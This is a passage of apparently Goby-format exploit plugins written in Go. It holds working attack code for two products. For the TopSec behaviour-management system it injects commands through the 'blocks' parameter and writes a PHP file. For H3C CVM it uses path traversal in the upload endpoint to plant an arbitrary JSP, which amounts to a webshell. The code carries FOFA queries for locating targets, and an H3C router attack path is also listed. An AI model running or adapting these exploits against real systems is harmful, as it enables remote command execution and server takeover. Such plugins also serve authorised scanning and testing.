Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</p>","Recommendation":"<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">At present, the manufacturer has not released a security patch. Please pay attention to the official update.<a href=\"https://www.topsec.com.cn/product/27.html\" target=\"_blank\">https://www.topsec.com.cn/product/27.html</a></span><br></p>","Impact":"<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">There is an arbitrary command execution vulnerability in the TopSec Internet behavior management system. Attackers can execute arbitrary commands on the system, write files, obtain webshell, and read sensitive information.</span><br></p>","VulType":["Command Execution"],"Tags":["Command Execution"]}},"AttackSurfaces":{"Application":null,"Support":null,"Service":null,"System":null,"Hardware":null}}`

// exploitTopACM092348783482 sends a single GET whose blocks parameter is
// "|%20" followed by the URL-escaped cmd, and returns true when the response
// is 200 and its body contains "ip -6 neigh del".
// NOTE(review): that marker reads like the page's own command template rather
// than cmd's output, so a true result shows the endpoint answered normally,
// not that cmd ran or what it produced. The PoC closure compensates by
// fetching the file it wrote; the exploit closure does not.
exploitTopACM092348783482 := func(cmd string, host *httpclient.FixUrl) bool {
    // Request URL: cmd is injected after "|" in the blocks parameter.
    requestConfig := httpclient.NewGetRequestConfig("/view/IPV6/naborTable/static_convert.php?blocks=|%20" + url.QueryEscape(cmd))
    requestConfig.VerifyTls = false
    requestConfig.FollowRedirect = false
    // Units are not visible here; presumably seconds — confirm in httpclient.
    requestConfig.Timeout = 15

    // Send the request.
    if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
      if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "ip -6 neigh del") {
      return true
      }
    }
    return false
}

// checkExistFileTopACM092348783482 GETs /<fileName>.php on the scanned host
// and returns true when the 200 response body contains fileContent. It is
// the only place where a command's effect is actually observed.
checkExistFileTopACM092348783482 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
    // Request URL: the file the PoC expects to have written.
    requestConfig := httpclient.NewGetRequestConfig("/" + fileName + ".php")
    requestConfig.VerifyTls = false
    requestConfig.FollowRedirect = false
    requestConfig.Timeout = 15

    // Send the request.
    if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil {
      if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) {
      return true
      }
    }
    return false
}

ExpManager.AddExploit(NewExploit(
    goutils.GetFileName(),
    expJson,
    func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {

      // Generate a random file name (presumably 6 hex characters).
      randomFileName := goutils.RandomHexString(6)

      // PoC payload: per the original author, the base64 decodes to a
      // self-deleting PHP file,
      // <?php echo md5(233);unlink(__FILE__);
      // written to /var/www/html/<rand>.php. The follow-up GET expects
      // md5("233") = e165421110ba03099a1c0393373c5b43. Because the file unlinks
      // itself on first request, a successful PoC leaves nothing behind; if the
      // write succeeded but the GET never reached it (e.g. the scanned port is
      // not the PHP vhost), the file remains.
      if exploitTopACM092348783482("echo PD9waHAgZWNobyBtZDUoMjMzKTt1bmxpbmsoX19GSUxFX18pOw== |base64 -d >/var/www/html/"+randomFileName+".php", u) {
      return checkExistFileTopACM092348783482(randomFileName, "e165421110ba03099a1c0393373c5b43", u)
      }

      return false
    },
    func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {

      // Unchecked type assertion: panics if "cmd" is absent or not a string.
      cmd := ss.Params["cmd"].(string)

      // Success is reported solely on the helper's marker check (see the note
      // on exploitTopACM092348783482); command output is not captured and
      // Output is a fixed string. The default cmd in ExpParams writes a phpinfo
      // file to /var/www/html/3.php that nothing removes.
      if exploitTopACM092348783482(cmd, expResult.HostInfo) {
      expResult.Success = true
      expResult.Output = "命令执行成功"
      }

      return expResult
    },
))
}

// https://heiwado.cn:8443/
10、H3C 企业路由器 (ER、ERG2、GR 系列) 任意用户登录/命令执行
/userLogin.asp/actionpolicy_status/

11、H3C CVM 前台任意文件上传漏洞
package exploits

import (
"git.gobies.org/goby/goscanner/goutils"
"git.gobies.org/goby/goscanner/jsonvul"
"git.gobies.org/goby/goscanner/scanconfig"
"git.gobies.org/goby/httpclient"
"strings"
)

func init() {
// Plugin metadata consumed by the scanner. Note for reviewers: ScanSteps and
// ExploitSteps below only GET /test.php and look for the string "test" -- they
// do not exercise the CVM upload at all; the Go closures handed to NewExploit
// further down implement the actual check and exploit (whether the scanner
// still runs these JSON steps is not visible here). References lists only
// fofa.so and CVEIDs/CNNVD/CNVD are empty, so there is no vendor advisory to
// cross-check the "no official patch" statement against.
expJson := `{
      "Name": "H3C CVM Arbitrary File Upload Vulnerability",
      "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
      "Product": "H3C-CVM",
"Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/",
"DisclosureDate": "2022-05-25",
"Author": "su18@javaweb.org",
"FofaQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")",
"GobyQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")",
"Level": "3",
      "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
      "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
"References": [
    "https://fofa.so/"
],
"Is0day": false,
"HasExp": true,
"ExpParams": [
    {
      "name": "fileName",
      "type": "input",
      "value": "evil",
      "show": ""
    },
    {
      "name": "fileContent",
      "type": "input",
      "value": "<%out.println(\"123\");%>",
      "show": ""
    }
],
"ExpTips": {
    "Type": "",
    "Content": ""
},
"ScanSteps": [
    "AND",
    {
      "Request": {
      "method": "GET",
      "uri": "/test.php",
      "follow_redirect": true,
      "header": {},
      "data_type": "text",
      "data": ""
      },
      "ResponseTest": {
      "type": "group",
      "operation": "AND",
      "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
      ]
      },
      "SetVariable": []
    }
],
"ExploitSteps": [
    "AND",
    {
      "Request": {
      "method": "GET",
      "uri": "/test.php",
      "follow_redirect": true,
      "header": {},
      "data_type": "text",
      "data": ""
      },
      "ResponseTest": {
      "type": "group",
      "operation": "AND",
      "checks": [
          {
            "type": "item",
            "variable": "$code",
            "operation": "==",
            "value": "200",
            "bz": ""
          },
          {
            "type": "item",
            "variable": "$body",
            "operation": "contains",
            "value": "test",
            "bz": ""
          }
      ]
      },
      "SetVariable": []
    }
],
"Tags": [
    "Arbitrary File Creation"
],
"VulType": [
    "Arbitrary File Creation"
],
"CVEIDs": [
    ""
],
"CNNVD": [
    ""
],
"CNVD": [
    ""
],
"CVSSScore": "8.0",
"Translation": {
    "CN": {
      "Name": "H3C CVM 前台任意文件上传漏洞",
      "Product": "H3C-CVM",
      "Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
      "Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
      "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM</span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"> </span>存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>",
      "VulType": [
      "⽂件上传"
      ],
      "Tags": [
      "⽂件上传"
      ]
    },
    "EN": {
      "Name": "H3C CVM Arbitrary File Upload Vulnerability",
      "Product": "H3C-CVM",
      "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
      "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>",
      "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>",
      "VulType": [
      "Arbitrary File Creation"
      ],
      "Tags": [
      "Arbitrary File Creation"
      ]
    }
},
"AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
}
}`

exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
	// Upload helper for the CVM file-upload endpoint. The path traversal lives
	// in the "token" query parameter: the server evidently joins it onto its
	// upload directory, so the "/../../../../../var/lib/tomcat8/webapps/cas/..."
	// prefix escapes into the deployed web application and the request body is
	// written there as <fileName>.jsp. The Tomcat 8 webapps location is
	// hard-coded; a different install layout will drop the file elsewhere.
	// fileName is spliced into the query string unescaped -- an operator-
	// supplied name containing '&', '?' or '#' would corrupt the request.
	target := "/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + ".jsp&name=222"

	req := httpclient.NewPostRequestConfig(target)
	req.VerifyTls = false
	req.FollowRedirect = false
	// Range header carried over from the original PoC; presumably the upload
	// handler expects chunked-style uploads -- not verified here.
	req.Header.Store("Content-range", "bytes 0-10/20")
	// NOTE(review): Referer is always built with http:// regardless of the
	// target scheme -- confirm HTTPS targets still accept it.
	req.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login")
	req.Data = fileContent

	resp, err := httpclient.DoHttpRequest(host, req)
	if err != nil || resp.StatusCode != 200 {
		return false
	}
	// The marker is `"success\":true` at runtime (escaped inner quote): the
	// server apparently returns JSON wrapped inside a JSON string.
	return strings.Contains(resp.Utf8Html, "\"success\\\":true")
}

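checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool {
	// Verification GET: fetch the uploaded file and confirm the marker is in
	// the body. fileName may be given with or without a leading slash. The
	// original unconditionally prepended "/", so the PoC's "/cas/js/lib/..."
	// became "//cas/js/lib/..." -- not the path the upload targeted, and a
	// double slash is something front-end proxies or WAFs may reject.
	// Only a 200 whose body contains fileContent counts: a generic 200 page
	// must not be mistaken for the uploaded JSP.
	req := httpclient.NewGetRequestConfig("/" + strings.TrimPrefix(fileName, "/"))
	req.VerifyTls = false
	req.FollowRedirect = false

	resp, err := httpclient.DoHttpRequest(host, req)
	if err != nil {
		return false
	}
	return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent)
}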

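ExpManager.AddExploit(NewExploit(
	goutils.GetFileName(),
	expJson,
	// PoC: upload a JSP that prints a random marker, then fetch it back.
	// The upload helper writes to /cas/js/lib/buttons/<name>.jsp, so the
	// verification GET targets that same path. The path is passed without a
	// leading slash because the check helper prepends "/" itself (the old
	// call passed "/cas/...", producing "//cas/...").
	// Operator caveat: this JSP is never removed -- every successful PoC run
	// leaves <name>.jsp on the target.
	func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
		marker := goutils.RandomHexString(6)
		name := goutils.RandomHexString(6)
		if !exploitUploadFile2398429842(name, "<%out.print(\""+marker+"\");%>", u) {
			return false
		}
		return checkUploadFile12312313810923("cas/js/lib/buttons/"+name+".jsp", marker, u)
	},
	// Exp: upload operator-supplied content under an operator-supplied name.
	// Both values go into the request unescaped (see the upload helper).
	func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
		// Guarded assertions: a missing or non-string parameter previously
		// panicked inside the scanner instead of reporting a failure.
		fileContent, okContent := ss.Params["fileContent"].(string)
		fileName, okName := ss.Params["fileName"].(string)
		if !okContent || !okName {
			expResult.Output = "缺少 fileName 或 fileContent 参数"
			return expResult
		}
		if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) {
			expResult.Success = true
			expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp"
		}
		return expResult
	},
))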
}